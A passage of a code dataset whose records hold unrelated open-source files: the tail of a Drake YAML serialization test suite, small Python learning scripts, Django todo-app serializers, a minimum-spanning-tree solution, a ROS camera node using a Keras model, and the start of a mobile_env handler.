@run_with_multiple_values(_all_typed_read_options())\n def test_read_nested(self, *, options):\n data = dedent(\"\"\"\n outer_value: 1.0\n inner_struct:\n inner_value: 2.0\n \"\"\")\n x = yaml_load_typed(schema=OuterStruct, data=data, **options)\n expected = dict(foo=0.0, bar=1.0)\n self.assertEqual(x, OuterStruct(1.0, InnerStruct(2.0)))\n\n # TODO(jwnimmer-tri) Add a test case similar to NestedWithMergeKeys from\n # the C++ YAML test suite.\n\n # TODO(jwnimmer-tri) Add a test case similar to NestedWithBadMergeKey from\n # the C++ YAML test suite.\n\n # TODO(jwnimmer-tri) Add a test cases similar to these from the C++ YAML\n # test suite:\n # - VisitScalarFoundNothing\n # - VisitScalarFoundArray\n # - VisitScalarFoundStruct\n # - VisitArrayFoundNothing\n # - VisitArrayFoundScalar\n # - VisitArrayFoundStruct\n # - VisitVectorFoundNothing\n # - VisitVectorFoundScalar\n # - VisitVectorFoundStruct\n # - VisitOptionalScalarFoundSequence\n # - VisitEigenFoundNothing\n # - VisitEigenFoundScalar\n # - VisitEigenMatrixFoundOneDimensional\n # - VisitEigenMatrixFoundNonSquare\n # - VisitStructFoundNothing\n # - VisitStructFoundScalar\n # - VisitStructFoundArray\n\n\nclass TestYamlTypedReadAcceptance(unittest.TestCase):\n \"\"\"Acceptance tests for the typed yaml_load function(s).\n\n This test class is the Python flavor of the C++ test suite at\n drake/common/yaml/test/yaml_io_test.cc\n and should be roughly kept in sync with the test cases in that file.\n \"\"\"\n\n def test_load_string(self):\n data = dedent(\"\"\"\n value:\n some_value\n \"\"\")\n result = yaml_load_typed(schema=StringStruct, data=data)\n self.assertEqual(result.value, \"some_value\")\n\n def test_load_string_child_name(self):\n data = dedent(\"\"\"\n some_child_name:\n value:\n some_value\n \"\"\")\n result = yaml_load_typed(schema=StringStruct, data=data,\n child_name=\"some_child_name\")\n self.assertEqual(result.value, \"some_value\")\n\n # When the requested child_name does not exist, that's an error.\n with self.assertRaisesRegex(KeyError, \"wrong_child_name\"):\n yaml_load_typed(schema=StringStruct, data=data,\n child_name=\"wrong_child_name\")\n\n def test_load_string_defaults(self):\n data = dedent(\"\"\"\n value:\n some_key: 1.0\n \"\"\")\n defaults = MapStruct()\n\n # Merge the default map value(s).\n result = yaml_load_typed(\n schema=MapStruct, data=data, defaults=defaults)\n self.assertDictEqual(result.value, dict(\n nominal_float=nan,\n some_key=1.0))\n\n # Replace the default map value(s).\n result = yaml_load_typed(\n schema=MapStruct, data=data, defaults=defaults,\n retain_map_defaults=False)\n self.assertDictEqual(result.value, dict(some_key=1.0))\n\n def test_load_string_options(self):\n data = dedent(\"\"\"\n value: some_value\n extra_junk: will_be_ignored\n \"\"\")\n result = yaml_load_typed(schema=StringStruct, data=data,\n allow_yaml_with_no_schema=True)\n self.assertEqual(result.value, \"some_value\")\n\n # Cross-check that the option actually was important.\n with self.assertRaisesRegex(RuntimeError, \".*extra_junk.*\"):\n yaml_load_typed(schema=StringStruct, data=data)\n\n def test_load_file(self):\n filename = FindResourceOrThrow(\n \"drake/common/yaml/test/yaml_io_test_input_1.yaml\")\n result = yaml_load_typed(schema=StringStruct, filename=filename)\n self.assertEqual(result.value, \"some_value_1\")\n\n def test_read_bad_schema(self):\n # N.B. This test covers python-specific error handling, so does not\n # have any corrresponding cases in the C++ unit tests.\n with self.assertRaisesRegex(Exception, \"should have been a dict\"):\n yaml_load_typed(\n schema=typing.List[float], data=\"[1.0]\", defaults=[])\n\n\nclass TestYamlTypedWrite(unittest.TestCase):\n \"\"\"Detailed tests for the yaml_dump_typed function.\n\n This test class is the Python flavor of the C++ test suite at\n drake/common/yaml/test/yaml_write_archive_test.cc\n and should be roughly kept in sync with the test cases in that file.\n \"\"\"\n\n def test_write_float(self):\n cases = [\n (0.0, \"0.0\"),\n (1.0, \"1.0\"),\n (-1.0, \"-1.0\"),\n (0.009, \"0.009\"),\n (1.2, \"1.2\"),\n (-1.2, \"-1.2\"),\n (5.6e+16, \"5.6e+16\"),\n (5.6e-12, \"5.6e-12\"),\n (-5.6e+16, \"-5.6e+16\"),\n (-5.6e-12, \"-5.6e-12\"),\n # See https://yaml.org/spec/1.2.2/#10214-floating-point.\n (nan, \".nan\"),\n (inf, \".inf\"),\n (-inf, \"-.inf\"),\n ]\n for value, expected_str in cases:\n actual_doc = yaml_dump_typed(FloatStruct(value=value))\n expected_doc = f\"value: {expected_str}\\n\"\n self.assertEqual(actual_doc, expected_doc)\n\n def test_write_string(self):\n cases = [\n (\"a\", \"a\"),\n (\"1\", \"'1'\"),\n ]\n for value, expected_str in cases:\n actual_doc = yaml_dump_typed(StringStruct(value=value))\n expected_doc = f\"value: {expected_str}\\n\"\n self.assertEqual(actual_doc, expected_doc)\n\n def test_write_list_plain(self):\n # When the vector items are simple YAML scalars, we should use \"flow\"\n # style, where they all appear on a single line.\n cases = [\n ([], \"value: []\\n\"),\n ([1.0, 2.0, 3.0], \"value: [1.0, 2.0, 3.0]\\n\"),\n ]\n for value, expected_doc in cases:\n actual_doc = yaml_dump_typed(ListStruct(value=value))\n self.assertEqual(actual_doc, expected_doc)\n\n def test_write_list_nested(self):\n # When the vector items are not simple scalars, we should use \"block\"\n # style, where each gets its own line(s).\n cases = [\n (\n [FloatStruct(value=1.0), FloatStruct(value=2.0)],\n dedent(\"\"\"\\\n value:\n - !FloatStruct\n value: 1.0\n - !FloatStruct\n value: 2.0\n \"\"\"),\n ),\n # Empty lists still use flow style.\n (\n [],\n dedent(\"\"\"\\\n value: []\n \"\"\"),\n ),\n ]\n for value, expected_doc in cases:\n actual_doc = yaml_dump_typed(ListVariantStruct(value=value))\n self.assertEqual(actual_doc, expected_doc)\n\n def test_write_map(self):\n cases = [\n (\n dict(),\n dedent(\"\"\"\\\n value: {}\n \"\"\"),\n ),\n (\n dict(foo=0.0),\n dedent(\"\"\"\\\n value:\n foo: 0.0\n \"\"\"),\n ),\n (\n dict(foo=0.0, bar=1.0),\n dedent(\"\"\"\\\n value:\n bar: 1.0\n foo: 0.0\n \"\"\"),\n ),\n ]\n for value, expected_doc in cases:\n actual_doc = yaml_dump_typed(MapStruct(value=value))\n self.assertEqual(actual_doc, expected_doc)\n\n def test_write_bad_map_key(self):\n @dc.dataclass\n class BadMapStruct:\n value: typing.Dict[int, float]\n with self.assertRaisesRegex(Exception, \"keys must be string\"):\n yaml_dump_typed(BadMapStruct({1: 2}))\n\n def test_write_map_directly(self):\n cases = [\n (\n dict(),\n dedent(\"\"\"\\\n {}\n \"\"\"),\n ),\n (\n dict(foo=0.0),\n dedent(\"\"\"\\\n foo: 0.0\n \"\"\"),\n ),\n (\n dict(foo=0.0, bar=1.0),\n dedent(\"\"\"\\\n bar: 1.0\n foo: 0.0\n \"\"\"),\n ),\n ]\n schema = typing.Dict[str, float]\n for value, expected_doc in cases:\n actual_doc = yaml_dump_typed(value, schema=schema)\n self.assertEqual(actual_doc, expected_doc)\n\n def test_write_optional(self):\n cases = [\n (1.0, \"value: 1.0\\n\"),\n (None, \"{}\\n\"),\n ]\n for value, expected_doc in cases:\n actual_doc = yaml_dump_typed(OptionalStruct(value=value))\n self.assertEqual(actual_doc, expected_doc)\n\n def test_write_variant(self):\n cases = [\n (\n \"\",\n \"value: ''\\n\",\n ),\n (\n \"foo\",\n \"value: foo\\n\",\n ),\n (\n FloatStruct(1.0),\n dedent(\"\"\"\\\n value: !FloatStruct\n value: 1.0\n \"\"\"),\n ),\n (\n NumpyStruct(np.array([1.0, 2.0])),\n dedent(\"\"\"\\\n value: !NumpyStruct\n value: [1.0, 2.0]\n \"\"\"),\n ),\n ]\n for value, expected_doc in cases:\n actual_doc = yaml_dump_typed(VariantStruct(value=value))\n self.assertEqual(actual_doc, expected_doc)\n\n # TODO(jwnimmer-tri) We'd like to see \"!!float 1.0\" here, but our\n # dumper does not yet support that output syntax.\n with self.assertRaisesRegex(Exception, \"float.*non-zero index\"):\n yaml_dump_typed(VariantStruct(value=1.0))\n\n # Check when the value in a Union is not one of the allowed types.\n with self.assertRaisesRegex(Exception, \"did not match\"):\n yaml_dump_typed(VariantStruct(value=MapStruct()))\n with self.assertRaisesRegex(Exception, \"does not allow None\"):\n yaml_dump_typed(VariantStruct(value=None))\n\n def test_write_nullable_variant(self):\n cases = [\n (\n None,\n \"value: null\\n\",\n ),\n (\n FloatStruct(1.0),\n dedent(\"\"\"\\\n value: !FloatStruct\n value: 1.0\n \"\"\"),\n ),\n ]\n for value, expected_doc in cases:\n actual_doc = yaml_dump_typed(NullableVariantStruct(value=value))\n self.assertEqual(actual_doc, expected_doc)\n\n def test_write_numpy_vector(self):\n cases = [\n ([], \"value: []\\n\"),\n ([1.0], \"value: [1.0]\\n\"),\n ([1.0, 0.0], \"value: [1.0, 0.0]\\n\"),\n ]\n for value, expected_doc in cases:\n actual_doc = yaml_dump_typed(NumpyStruct(value=np.array(value)))\n self.assertEqual(actual_doc, expected_doc)\n\n def test_write_numpy_matrix(self):\n x = NumpyStruct(value=np.array([\n [0.0, 1.0, 2.0, 3.0],\n [4.0, 5.0, 6.0, 7.0],\n [8.0, 9.0, 10.0, 11.0],\n ]))\n self.assertEqual(yaml_dump_typed(x), dedent(\"\"\"\\\n value:\n - [0.0, 1.0, 2.0, 3.0]\n - [4.0, 5.0, 6.0, 7.0]\n - [8.0, 9.0, 10.0, 11.0]\n \"\"\"))\n\n def test_write_numpy_matrix00(self):\n x = NumpyStruct(value=np.ndarray(shape=(0, 0)))\n self.assertEqual(yaml_dump_typed(x), dedent(\"\"\"\\\n value: []\n \"\"\"))\n\n def test_write_nested(self):\n x = OuterStruct()\n x.outer_value = 1.0\n x.inner_struct.inner_value = 2.0\n\n saved = yaml_dump_typed(x, child_name=\"doc\")\n expected = dedent(\"\"\"\\\n doc:\n outer_value: 1.0\n inner_struct:\n inner_value: 2.0\n \"\"\")\n self.assertEqual(saved, expected)\n\n def test_write_blank_inner(self):\n x = OuterWithBlankInner()\n x.outer_value = 1.0\n\n saved = yaml_dump_typed(x, child_name=\"doc\")\n expected = dedent(\"\"\"\\\n doc:\n outer_value: 1.0\n inner_struct: {}\n \"\"\")\n self.assertEqual(saved, expected)\n\n def test_write_child_name(self):\n x = FloatStruct(value=1.0)\n dut = functools.partial(yaml_dump_typed, data=x)\n self.assertEqual(dut(child_name=None), \"value: 1.0\\n\")\n self.assertEqual(dut(child_name=\"root\"), \"root:\\n value: 1.0\\n\")\n with self.assertRaisesRegex(Exception, \"child_name must be a prim\"):\n dut(child_name=[1, 2, 3])\n\n\nclass TestYamlTypedWriteDefaults(unittest.TestCase):\n \"\"\"Detailed tests for the yaml_dump_typed use of ``defaults=...``, in\n particular the _erase_matching_maps function.\n\n This test class is the Python flavor of the C++ test suite at\n drake/common/yaml/test/yaml_write_archive_defaults_test.cc\n and should be roughly kept in sync with the test cases in that file.\n \"\"\"\n\n def _save(self, data, defaults, child_name=\"doc\"):\n return yaml_dump_typed(\n data=data,\n defaults=defaults,\n child_name=child_name)\n\n def test_dump_default_basic_example1(self):\n # Shows the typical use -- that only the novel data is output.\n # The inner_struct is the same for both x and y, so is not output.\n defaults = OuterStruct()\n defaults.outer_value = 1.0\n defaults.inner_struct.inner_value = 2.0\n data = copy.deepcopy(defaults)\n data.outer_value = 3.0\n self.assertEqual(self._save(data, defaults), dedent(\"\"\"\\\n doc:\n outer_value: 3.0\n \"\"\"))\n\n def test_dump_default_basic_example2(self):\n # Shows the typical use -- that only the novel data is output.\n # The outer_value is the same for both x and y, so is not output.\n defaults = OuterStruct()\n defaults.outer_value = 1.0\n defaults.inner_struct.inner_value = 2.0\n data = copy.deepcopy(defaults)\n data.inner_struct.inner_value = 3.0\n self.assertEqual(self._save(data, defaults), dedent(\"\"\"\\\n doc:\n inner_struct:\n inner_value: 3.0\n \"\"\"))\n\n def test_dump_default_basic_example3(self):\n # Shows the typical use -- emit the content with or without providing a\n # root_name.\n defaults = OuterStruct()\n defaults.outer_value = 1.0\n data = OuterStruct()\n data.outer_value = 3.0\n data.inner_struct.inner_value = defaults.inner_struct.inner_value\n\n # Emit using the default \"doc\" root name.\n self.assertEqual(self._save(data, defaults), dedent(\"\"\"\\\n doc:\n outer_value: 3.0\n \"\"\"))\n\n # Emit using an empty root name.\n self.assertEqual(self._save(data, defaults, None), dedent(\"\"\"\\\n outer_value: 3.0\n \"\"\"))\n\n # Emit with an empty root name without defaults.\n self.assertEqual(self._save(defaults, defaults, None), dedent(\"\"\"\\\n {}\n \"\"\"))\n\n def test_dump_default_different_map_order1(self):\n # Same as the BasicExample1 from above, except that the map order of\n # the defaults vs data differs. The defaults still take effect.\n defaults = OuterStructOpposite()\n defaults.inner_struct.inner_value = 1.0\n defaults.outer_value = 2.0\n data = OuterStruct()\n data.outer_value = 3.0\n data.inner_struct.inner_value = defaults.inner_struct.inner_value\n\n self.assertEqual(self._save(data, defaults), dedent(\"\"\"\\\n doc:\n outer_value: 3.0\n \"\"\"))\n\n def test_dump_default_different_map_order2(self):\n # Same as the BasicExample2 from above, except that the map order of\n # the defaults vs data differs. The defaults still take effect.\n defaults = OuterStructOpposite()\n defaults.inner_struct.inner_value = 1.0\n defaults.outer_value = 2.0\n data = OuterStruct()\n data.outer_value = defaults.outer_value\n data.inner_struct.inner_value = 3.0\n\n self.assertEqual(self._save(data, defaults), dedent(\"\"\"\\\n doc:\n inner_struct:\n inner_value: 3.0\n \"\"\"))\n\n def test_dump_default_nulls(self):\n # YAML nulls are handled reasonably, without throwing.\n defaults = OptionalStruct()\n defaults.value = None\n data = copy.deepcopy(defaults)\n\n self.assertEqual(self._save(data, defaults), dedent(\"\"\"\\\n doc: {}\n \"\"\"))\n\n def test_dump_default_different_lists(self):\n # Lists differing in their values are not erased.\n defaults = ListStruct()\n defaults.value = [0.0, 0.0, 0.0]\n data = ListStruct()\n data.value = [1.0, 2.0, 3.0]\n\n self.assertEqual(self._save(data, defaults), dedent(\"\"\"\\\n doc:\n value: [1.0, 2.0, 3.0]\n \"\"\"))\n\n def test_dump_default_different_size_lists(self):\n # Lists differing in size (but sharing a prefix) are not erased.\n defaults = ListStruct()\n defaults.value = [1.0, 2.0]\n data = ListStruct()\n data.value = [1.0, 2.0, 3.0]\n\n self.assertEqual(self._save(data, defaults), dedent(\"\"\"\\\n doc:\n value: [1.0, 2.0, 3.0]\n \"\"\"))\n\n def test_dump_default_different_variant_tag(self):\n # Variants differing by tag are not erased.\n defaults = VariantStruct()\n defaults.value = NumpyStruct()\n data = VariantStruct()\n data.value = FloatStruct(1.0)\n\n self.assertEqual(self._save(data, defaults), dedent(\"\"\"\\\n doc:\n value: !FloatStruct\n value: 1.0\n \"\"\"))\n\n def test_dump_default_different_map_keys(self):\n # Maps differing in key only (same value) are not erased.\n defaults = MapStruct()\n defaults.value[\"b\"] = 1.0\n data = MapStruct()\n data.value[\"a\"] = 1.0\n\n self.assertEqual(self._save(data, defaults), dedent(\"\"\"\\\n doc:\n value:\n a: 1.0\n \"\"\"))\n\n def test_dump_default_different_map_values(self):\n # Maps differing in value only (same key) are not erased.\n defaults = MapStruct()\n defaults.value[\"a\"] = 2.0\n data = MapStruct()\n data.value[\"a\"] = 1.0\n\n self.assertEqual(self._save(data, defaults), dedent(\"\"\"\\\n doc:\n value:\n a: 1.0\n \"\"\"))\n\n\nclass TestYamlTypedWriteAcceptance(unittest.TestCase):\n \"\"\"Acceptance tests for the typed yaml_load function(s).\n\n This test class is the Python flavor of the C++ test suite at\n drake/common/yaml/test/yaml_io_test.cc\n and should be roughly kept in sync with the test cases in that file.\n \"\"\"\n\n def test_save_string(self):\n data = StringStruct(value=\"save_string\")\n result = yaml_dump_typed(data)\n self.assertEqual(result, \"value: save_string\\n\")\n\n def test_save_string_child(self):\n child_name = \"some_child\"\n data = StringStruct(value=\"save_string_child\")\n result = yaml_dump_typed(data, child_name=child_name)\n self.assertEqual(result, \"some_child:\\n value: save_string_child\\n\")\n\n def test_save_string_defaults(self):\n # N.B. The MapStruct.value dict contains a \"nominal_float\" by default.\n defaults = MapStruct()\n data = MapStruct()\n data.value[\"save_string\"] = 1.0\n assert len(data.value) == 2\n\n # Only the non-default map entry is saved.\n result = yaml_dump_typed(data, defaults=defaults)\n self.assertEqual(result, dedent(\"\"\"\\\n value:\n save_string: 1.0\n \"\"\"))\n\n # Inside the implementation of yaml_dump_typed, the code to save to a\n # string versus a file shares all of the same dumping logic; only at the\n # last moment do we choose to write the output to a string or a file.\n # Therefore, we don't need to repeat all of the schema-specific test cases\n # for files. Instead, we can just spot-check a few calls to probe the file\n # handling and argument passing.\n\n def test_save_file(self):\n filename = Path(os.environ[\"TEST_TMPDIR\"]) / \"save_file.yaml\"\n data = StringStruct(value=\"save_file\")\n yaml_dump_typed(filename=filename, data=data)\n readback = filename.read_text(encoding=\"utf-8\")\n self.assertEqual(readback, \"value: save_file\\n\")\n\n def test_save_file_all_args(self):\n # N.B. The MapStruct.value dict contains a \"nominal_float\" by default.\n defaults = MapStruct()\n data = MapStruct()\n data.value[\"save_file\"] = 1.0\n assert len(data.value) == 2\n\n filename = Path(os.environ[\"TEST_TMPDIR\"]) / \"save_file_all_args.yaml\"\n yaml_dump_typed(\n filename=filename,\n data=data,\n child_name=\"some_child\",\n defaults=defaults,\n )\n readback = filename.read_text(encoding=\"utf-8\")\n self.assertEqual(readback, dedent(\"\"\"\\\n some_child:\n value:\n save_file: 1.0\n \"\"\"))\n\n def test_write_bad_schema(self):\n # N.B. This test covers python-specific error handling, so does not\n # have any corrresponding cases in the C++ unit tests.\n with self.assertRaisesRegex(Exception, \"should have been a dict\"):\n yaml_dump_typed([1.0], schema=typing.List[float])\n\n\nclass TestYamlTypedReadPybind11(unittest.TestCase):\n \"\"\"Tests for (de)serializing into pybind11 objects.\"\"\"\n\n def test_missing_serialize_binding(self):\n # For testing the error message in case of missing C++ bindings, we\n # just need any bound C++ class that doesn't have a Serialize().\n # We'll use Value to avoid dependencies on non-'common' code.\n invalid_cxx_class = Value[str]\n with self.assertRaisesRegex(RuntimeError, \".*lacks.*__fields__.*\"):\n yaml_dump_typed(invalid_cxx_class())\n with self.assertRaisesRegex(RuntimeError, \".*lacks.*__fields__.*\"):\n yaml_load_typed(schema=invalid_cxx_class, data=\"{}\")\n\n def test_mydata2(self):\n data = dedent(\"\"\"\\\n some_bool: true\n some_int: 1\n some_uint64: 1\n some_float: 1.0\n some_double: 1.0\n some_string: one\n some_eigen:\n - [1.0]\n some_optional: 1.0\n some_vector: [1.0]\n some_map:\n one: 1.0\n some_variant: !MyData1\n quux: 1.0\n \"\"\")\n x = yaml_load_typed(schema=MyData2, data=data)\n self.assertEqual(x.some_bool, True)\n self.assertEqual(x.some_int, 1)\n self.assertEqual(x.some_uint64, 1)\n self.assertEqual(x.some_float, 1.0)\n self.assertEqual(x.some_double, 1.0)\n self.assertEqual(x.some_string, \"one\")\n self.assertEqual(x.some_eigen, [1.0])\n self.assertEqual(x.some_optional, 1.0)\n self.assertEqual(x.some_vector, [1.0])\n self.assertEqual(x.some_map, dict(one=1.0))\n self.assertEqual(x.some_variant.quux, 1.0)\n self.assertEqual(yaml_dump_typed(x), data)\n","repo_name":"mwoehlke-kitware/drake","sub_path":"bindings/pydrake/common/test/yaml_typed_test.py","file_name":"yaml_typed_test.py","file_ext":"py","file_size_in_byte":41521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"25457061702","text":"\r\nfrom collections import Counter\r\n\r\ndef descomponer(n):\r\n primos = []\r\n\r\n for i in range(2, n + 1):\r\n while n % i == 0:\r\n primos.append(i)\r\n n = n / i\r\n\r\n c = Counter \r\n for i in range(len(primos)):\r\n print(primos[i])\r\n\r\n\r\ndescomponer(20)","repo_name":"aldebarran22/curso_santander_avanzado","sub_path":"codigo_mar_23/pruebas.py","file_name":"pruebas.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"74321509354","text":"my_dog = { 'name': 'Ted', 'age': 15, 'breed': 'Border Collie'}\n# Key value pairs. 'name' is key - 'Ted' is value.\n# A tuple is an immutable list. Has key and value in it\n\nmy_dog['age'] = 16\n# Can change values\nmy_dog['owner'] = 'Matt'\n# Can add keys\n\n# print(my_dog.items())\n# Gives tuples\n\n# for k, v in my_dog.items():\n# print(f'The value of \"{k}\" is {v}')\n\n# print(item) Gives keys, my_dog[item] gives values\n\nprint(my_dog.get('stage', 'Unknown'))\n\n# by using the .get method it returns None rather than error. ","repo_name":"ValK-98/ca2023","sub_path":"python/data-structures/dicts.py","file_name":"dicts.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38122364400","text":"from rest_framework import serializers\nfrom core.models import (\n TodoCard,\n UserTodo,\n)\nfrom drf_spectacular.utils import (\n extend_schema_serializer,\n OpenApiExample,\n)\nfrom app_todo.utils import (\n separate_to_tasks_by_color_from_serialize_data,\n)\n\n\n@extend_schema_serializer(\n examples=[\n OpenApiExample(\n 'response detail',\n description='',\n value={\n \"id\": 0,\n \"name\": \"swim tonight\",\n \"color\": \"HT\",\n \"description\": \"swim with Peter & Dough\",\n \"done_at\": \"2022-12-08T09:39:47.454Z\",\n },\n response_only=True, ), ])\nclass TodoCardSerializer(serializers.ModelSerializer):\n class Meta:\n model = TodoCard\n fields = [\n 'id',\n 'name',\n 'description',\n 'color',\n 'done_at']\n read_only_fields = ['id', 'done_at']\n\n def create(self, validate_data):\n user = self.context['request'].user\n user_todo, _ = UserTodo.objects.get_or_create(user=user)\n todo_card = TodoCard.objects.create(\n user_todo=user_todo,\n **validate_data)\n return todo_card\n\n def update(self, instance, validated_data):\n for attr, value in validated_data.items():\n setattr(instance, attr, value)\n\n instance.save()\n return instance\n\n\n@extend_schema_serializer(\n examples=[\n OpenApiExample(\n 'response example',\n description='',\n value={\n \"id\": 0,\n \"name\": \"swim tonight\",\n \"description\": \"swim with Peter & Dough\",\n \"color\": \"HT\",\n \"done_at\": \"2022-12-08T09:39:47.454Z\",\n \"created_at\": \"2022-12-08T09:39:47.454Z\",\n \"updated_at\": \"2022-12-08T09:39:47.454Z\"\n },\n response_only=True,),\n OpenApiExample(\n 'request example',\n description='',\n value={\n \"name\": \"swim tonight\",\n \"description\": \"swim with Peter & Dough\",\n \"color\": \"HT\",\n },\n request_only=True, ), ])\nclass TodoCardDetailSerializer(TodoCardSerializer):\n class Meta(TodoCardSerializer.Meta):\n fields = TodoCardSerializer.Meta.fields + ['created_at', 'updated_at']\n read_only_fields = TodoCardSerializer.Meta.read_only_fields \\\n + ['created_at', 'updated_at']\n\n\n@extend_schema_serializer(\n examples=[\n OpenApiExample(\n 'set task done',\n description='',\n value={'is_done': True},\n request_only=True,),\n OpenApiExample(\n 'set task not done yet',\n description='',\n value={'is_done': False},\n request_only=True, ), ])\nclass RequestTodoCardStatusSerializer(serializers.Serializer):\n is_done = serializers.BooleanField(required=True)\n\n\n@extend_schema_serializer(\n examples=[\n OpenApiExample(\n 'set task done',\n description='',\n value={\n 'pink_task': [{\n \"id\": 1,\n \"name\": \"some task\",\n \"description\": \"some task\",\n \"color\": \"HT\",\n \"done_at\": \"2022-12-08T10:33:12.417Z\"\n }, {\n \"id\": 2,\n \"name\": \"some task\",\n \"description\": \"some task\",\n \"color\": \"HT\",\n \"done_at\": \"2022-12-08T10:33:12.417Z\"\n }, ],\n 'orange_task': [{\n \"id\": 3,\n \"name\": \"some task\",\n \"description\": \"some task\",\n \"color\": \"H\",\n \"done_at\": \"2022-12-08T10:33:12.417Z\"\n }, {\n \"id\": 4,\n \"name\": \"some task\",\n \"description\": \"some task\",\n \"color\": \"H\",\n \"done_at\": \"2022-12-08T10:33:12.417Z\"\n }, ],\n 'blue_task': [{\n \"id\": 5,\n \"name\": \"some task\",\n \"description\": \"some task\",\n \"color\": \"L\",\n \"done_at\": \"2022-12-08T10:33:12.417Z\"\n }, {\n \"id\": 6,\n \"name\": \"some task\",\n \"description\": \"some task\",\n \"color\": \"L\",\n \"done_at\": \"2022-12-08T10:33:12.417Z\"\n }, ],\n 'green_task': [{\n \"id\": 7,\n \"name\": \"some task\",\n \"description\": \"some task\",\n \"color\": \"LT\",\n \"done_at\": \"2022-12-08T10:33:12.417Z\"\n }, {\n \"id\": 8,\n \"name\": \"some task\",\n \"description\": \"some task\",\n \"color\": \"LT\",\n \"done_at\": \"2022-12-08T10:33:12.417Z\"\n }, ],\n },\n response_only=True, ), ])\nclass ResponseGetListByColor(serializers.Serializer):\n\n pink_task = TodoCardDetailSerializer(many=True)\n orange_task = TodoCardDetailSerializer(many=True)\n blue_task = TodoCardDetailSerializer(many=True)\n green_task = TodoCardDetailSerializer(many=True)\n\n def to_representation(self, internal_data: list[TodoCard]):\n \"\"\"\n internal_data: serialized data get from database\n \"\"\"\n deserialize_data = TodoCardSerializer(\n internal_data, many=True).data\n instance = \\\n separate_to_tasks_by_color_from_serialize_data(\n deserialize_data)\n\n return instance\n","repo_name":"qitpy/django-server","sub_path":"src/app_todo/serializers/todo_card_serializer.py","file_name":"todo_card_serializer.py","file_ext":"py","file_size_in_byte":5808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34842530790","text":"import sys\nsys.stdin = open('input.txt')\n\ndef find_set(x): # x가 속한 집합의 대표 리턴\n while x != rep[x]:\n x = rep[x]\n return x\n\ndef union(x, y): # y의 대표원소가 x의 대표원소를 가리키도록\n rep[find_set(y)] = find_set(x)\n\nT = int(input())\n\nfor tc in range(1, T+1):\n V, E = map(int, input().split())\n rep = [i for i in range(V+1)]\n arr = [list(map(int, input().split())) for _ in range(E)]\n arr.sort(key = lambda x : x[2])\n cnt = 0\n s = 0\n for u, v, w in arr:\n if find_set(u) != find_set(v):\n cnt += 1\n s += w\n union(u, v)\n if cnt == V:\n break\n \n print(f'#{tc}', s)","repo_name":"AndreaStudy/PythonAlgo","sub_path":"swea/problems/MST/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35413746909","text":"import rospy\nfrom sensor_msgs.msg import Image\n\nimport cv2\nimport numpy as np\nimport tensorflow.keras\n\nfrom std_msgs.msg import Float32MultiArray\nfrom std_msgs.msg import MultiArrayDimension\n\nprint(\"Complete to open Simple_camera Node\")\n\nUSE_ML = True\n\nif(USE_ML):\n np.set_printoptions(suppress=True)\n\n model = tensorflow.keras.models.load_model('/home/racecar/catkin_ws/src/racecar_ws/src/keras_model.h5')\n data = np.ndarray(shape=(1, 224, 224, 3), dtype=np.float32)\n\ncap = cv2.VideoCapture(0)\ncap.set(cv2.CAP_PROP_FRAME_WIDTH,640)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT,480)\n\n\nrospy.init_node('camera')\npub_im = rospy.Publisher('/camera', Image, queue_size=1)\nML_pub = rospy.Publisher('/teachable_machine', Float32MultiArray, queue_size=1)\n\nwhile not rospy.is_shutdown():\n\n _, frame = cap.read()\n\n if frame is None:\n continue\n\n msg = Image()\n msg.height = frame.shape[0]\n msg.width = frame.shape[1]\n msg.encoding = 'bgr8'\n msg.is_bigendian = 0\n msg.step = 3 * msg.width\n msg.data = frame.flatten().tostring()\n\n pub_im.publish(msg)\n\n if(USE_ML):\n \timage_array = cv2.resize(frame, (224, 224), interpolation = cv2.INTER_AREA)\n \tnormalized_image_array = image_array.astype(np.float32)/127.0 - 1\n \tdata[0] = normalized_image_array\n \tprediction = model.predict(data)\n \t#print(prediction)\n \tprediction_data = Float32MultiArray()\n \tprediction_data.data = np.array(prediction).flatten()\n \tML_pub.publish(prediction_data)\n\n\n\n\ncap.release()\n\n","repo_name":"nulLeeKH/2020-unist-stem-camp","sub_path":"autonomous-car-challange/src/vision-control/simple_camera.py","file_name":"simple_camera.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"3502155859","text":"from typing import Dict\r\n\r\nimport gymnasium as gym\r\nimport numpy as np\r\n\r\nfrom mobile_env.handlers.handler import Handler\r\n\r\n\r\nclass MComMAHandler(Handler):\r\n features = [\r\n \"budget\",\r\n \"bundles\",\r\n \"tasks\",\r\n \"net-states\",\r\n ]\r\n\r\n @classmethod\r\n def action_space(cls, env) -> gym.spaces.Dict:\r\n sp_action_space = gym.spaces.Dict(\r\n {inp.inp_id: gym.spaces.Discrete(10001) for inp in env.inps}\r\n )\r\n return gym.spaces.Dict({sp.sp_id: sp_action_space for sp in env.sps})\r\n\r\n @classmethod\r\n def observation_space(cls, env) -> gym.spaces.Dict:\r\n bundles_space = gym.spaces.Box(\r\n low=0, high=np.inf, shape=(env.NUM_InPs, 3), dtype=np.int32\r\n )\r\n tasks_space = gym.spaces.Box(\r\n low=0, high=np.inf, shape=(env.NUM_USERS, 4), dtype=np.int32\r\n )\r\n net_states_space = gym.spaces.Box(\r\n low=0,\r\n high=np.inf,\r\n shape=(env.NUM_USERS * env.NUM_EDGE_SERVERS, 3),\r\n dtype=np.float64,\r\n )\r\n\r\n sp_space = gym.spaces.Dict(\r\n {\r\n \"budget\": gym.spaces.Box(low=0, high=np.inf, shape=(1,), dtype=np.int),\r\n \"bundles\": bundles_space,\r\n \"tasks\": tasks_space,\r\n \"net-states\": net_states_space,\r\n }\r\n )\r\n\r\n space = {sp.sp_id: sp_space for sp in env.sps}\r\n\r\n space = gym.spaces.Dict(space)\r\n return space\r\n\r\n @classmethod\r\n def reward(cls, env):\r\n rewards = {}\r\n return rewards\r\n\r\n @classmethod\r\n def 